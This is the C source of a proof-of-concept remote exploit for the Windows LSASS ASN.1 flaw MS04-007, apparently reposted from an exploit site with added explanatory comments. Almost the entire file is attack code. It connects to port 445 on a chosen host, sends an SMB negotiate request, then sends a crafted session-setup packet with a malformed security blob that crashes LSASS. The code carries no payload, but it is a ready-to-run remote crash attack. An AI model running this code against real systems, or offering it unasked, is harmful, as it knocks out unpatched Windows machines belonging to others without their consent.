Microsoft Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)
/*
* MS04-007 LSASS.EXE Remote Integer Overflow (unfinished)
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
/*
* inside Visual C++ : Build -> Start Debug -> Attach to Process -> LSASS
* after running this code, LSASS generates an Access violation (0xC0000005)
* at LSASRV!0x78543102 call dword ptr [ecx+20h]
*/
#ifdef WIN32
#include <winsock2.h>
#include <windows.h>
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
/****************************************************************/
/*
 * SMB_COM_NEGOTIATE request (command byte 0x72), sent to the target verbatim.
 * Layout: 4-byte NetBIOS session header (type 0x00, length 0xB3 = 179, which
 * matches the 32 + 147 bytes that follow), the 32-byte SMB header
 * ("\xFFSMB", command, status, flags/flags2, TID/PID/UID, MID 0x0001), then
 * the dialect list: each entry is a 0x02 byte followed by a NUL-terminated
 * name ("PC NETWORK PROGRAM 1.0" ... "NT LM 0.12").
 * The sizeof()-1 in main() drops the string literal's trailing NUL.
 */
unsigned char negotiate_req[] =
/* NetBIOS Message Type + Length & SMB Header */
"\x00\x00\x00\xB3"
"\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\x13\x00\x00\x01\x00"
/* Negotiate Protocol Request dialect list, captured from an smbclient session */
"\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50"
"\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52"
"\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31"
"\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E"
"\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E"
"\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31"
"\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D"
"\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E"
"\x31\x32\x00";
/****************************************************************/
/*
 * SMB_COM_SESSION_SETUP_ANDX request (command byte 0x73) - fixed part only.
 * The NetBIOS length byte (0xFF), the SecurityBlobLength word at offset 51
 * (0x52) and the ByteCount word at offset 61 (0x69) are placeholders: main()
 * overwrites them in buf[] after appending security_blob and other_stuff.
 * MID is 0x0002 (negotiate_req used 0x0001); the rest of the SMB header is
 * the same.
 */
unsigned char setup_request[] =
/* NetBIOS Message Type + Length & SMB Header */
"\x00\x00\x00\xFF"
"\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE7\x13\x00\x00\x02\x00"
/* Session Setup AndX Request parameter block: WordCount 0x0C, AndX 0xFF (none),
 * MaxBuffer, MaxMpx, VcNumber, SessionKey, SecurityBlobLength, reserved,
 * Capabilities, then ByteCount */
"\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\x52"
"\x00\x00\x00\x00\x00\x5C\x00\x00\x80\x69\x00";
/*
 * Security Blob: a GSS-API InitialContextToken (tag 0x60, length 0x57)
 * carrying the SPNEGO OID 1.3.6.1.5.5.2, then a NegTokenInit
 * ([0] length 0x4D wrapping a SEQUENCE of length 0x4B) with:
 *   [0] mechTypes - a single OID, 1.3.6.1.4.1.311.2.2.10 (NTLMSSP)
 *   [1] reqFlags  - tag 0x23, i.e. a BIT STRING with the constructed bit set,
 *                   wrapping a primitive BIT STRING (03 01 07). This is the
 *                   only non-plain BER encoding in the blob; presumably the
 *                   element that reaches the faulting ASN.1 decoder, but the
 *                   page does not confirm that.
 *   [2] mechToken - OCTET STRING (0x30 bytes) holding an NTLMSSP Type 1
 *                   (Negotiate) message: flags 60 08 02 15, domain
 *                   "WORKGROUP" (len 9 at offset 32), workstation "XXXXXXX"
 *                   (len 7 at offset 41).
 * Every nested length is consistent with the 89 bytes actually present.
 */
unsigned char security_blob[] =
"\x60\x57\x06\x06\x2B\x06\x01\x05\x05\x02"
"\xA0\x4D\x30\x4B"
"\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A"
"\xA1\x05\x23\x03\x03\x01\x07"
"\xA2\x32\x04\x30\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00"
"\x15\x02\x08\x60\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00"
"\x29\x00\x00\x00\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x58\x58\x58"
"\x58\x58\x58\x58";
/*
 * Trailing SMB data after the blob: one 0x00 alignment pad, then the
 * NativeOS string "Unix" and the NativeLanMan string "Samba", both UTF-16LE
 * and NUL-terminated. The original author noted this as the spot where a
 * payload would go; as written the program carries none and, per the header
 * comment, only makes LSASS fault.
 */
unsigned char other_stuff[] =
"\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D"
"\x00\x62\x00\x61\x00\x00\x00";
/****************************************************************/
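/* 16-bit type used by main() for the in-place length-field stores.
 * A typedef rather than an object-like macro: it is scoped, type-checked
 * and visible to the debugger, and cannot collide with or silently rewrite
 * a same-named identifier pulled in by a platform header. */
typedef unsigned short uint16;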
/*
 * Entry point of the proof-of-concept: connect to <target hostname>:445,
 * send the SMB Negotiate Protocol request, then send a Session Setup AndX
 * request assembled from setup_request + security_blob + other_stuff.
 * As the header comment states, this is unfinished: it carries no payload
 * and only makes LSASS fault on a vulnerable target.
 *
 * argv[1]  target hostname, resolved with gethostbyname().
 * Returns 0 once the second response has been read (or the peer has gone
 * away), 1 on usage, name resolution, socket, connect, send or first-recv
 * failure.
 *
 * NOTE(review): memcpy() is used below but <string.h> is never included,
 * so on the non-WIN32 path it is only implicitly declared.
 */
int main( int argc, char *argv[] )
{
int len, server_fd, n1, n2, n3;   /* n1..n3: byte sizes of the three request pieces */
struct sockaddr_in server_addr;   /* never zeroed; only family, port and address are set */
struct hostent *server_host;
unsigned char buf[4096];          /* receive buffer, later reused to build the request */
#ifdef WIN32
WSADATA wsa;
/* initialize windows sockets */
if( WSAStartup( MAKEWORD(2,0), &wsa ) )
{
fprintf( stderr, "WSAStartup failed\n" );
return( 1 );
}
#endif
if( argc != 2 )
{
fprintf( stderr, "usage: %s <target hostname>\n", argv[0] );
return( 1 );
}
/* resolve the server hostname and connect to it */
server_host = gethostbyname( argv[1] );
if( server_host == NULL )
{
fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] );
return( 1 );
}
/* first address only; h_length is trusted to fit sin_addr (4 for AF_INET) */
memcpy( (void *) &server_addr.sin_addr,
(void *) server_host->h_addr,
server_host->h_length );
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons( 445 );   /* direct-hosted SMB over TCP */
server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
if( server_fd < 0 )
{
perror( "socket" );
return( 1 );
}
len = sizeof( server_addr );
if( connect( server_fd, (struct sockaddr *)
&server_addr, len ) < 0 )
{
perror( "connect on port 445" );
return( 1 );
}
/* send the Negotiate Protocol Request; its NetBIOS length byte is
 * already correct in the array. sizeof()-1 drops the literal's NUL. */
len = sizeof( negotiate_req ) - 1;
if( send( server_fd, negotiate_req, len, 0 ) != len )
{
perror( "send" );
return( 1 );
}
/* receive the Negotiate Protocol Response. Its contents are never parsed;
 * the only check is that at least one byte arrived (a short or partial
 * read passes). */
if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
{
perror( "recv" );
return( 1 );
}
/* now create the special SS&X Request:
 * setup_request | security_blob | other_stuff, well under sizeof buf */
n1 = sizeof( setup_request ) - 1;
n2 = sizeof( security_blob ) - 1;
n3 = sizeof( other_stuff ) - 1;
len = n1 + n2 + n3;
memcpy( buf, setup_request, n1 );
memcpy( buf + n1, security_blob, n2 );
memcpy( buf + n1 + n2, other_stuff, n3 );
/* Patch the placeholder length fields in place. The NetBIOS session length
 * (bytes 2-3, big-endian, excludes the 4-byte NetBIOS header) goes through
 * htons(); the two SMB words below are stored in host order, which matches
 * SMB's little-endian wire format only on a little-endian host. All three
 * are unaligned 16-bit stores through a cast pointer. */
*(uint16 *)( &buf[ 2] ) = htons( len - 4 );
*(uint16 *)( &buf[51] ) = n2; /* Security Blob Length */
*(uint16 *)( &buf[61] ) = n2 + n3; /* Byte Count (BCC) */
if( send( server_fd, buf, len, 0 ) != len )
{
perror( "send" );
return( 1 );
}
/* receive the SS&XR Response. The return value is not checked: with a
 * vulnerable target the connection is expected to drop when LSASS faults
 * (see header comment), so an error here is not treated as failure. */
recv( server_fd, buf, sizeof( buf ), 0 );
shutdown( server_fd, 2 );   /* 2 == SHUT_RDWR; the descriptor is never close()d */
return( 0 );
}
Fuente: www.k-otik.com

Saludos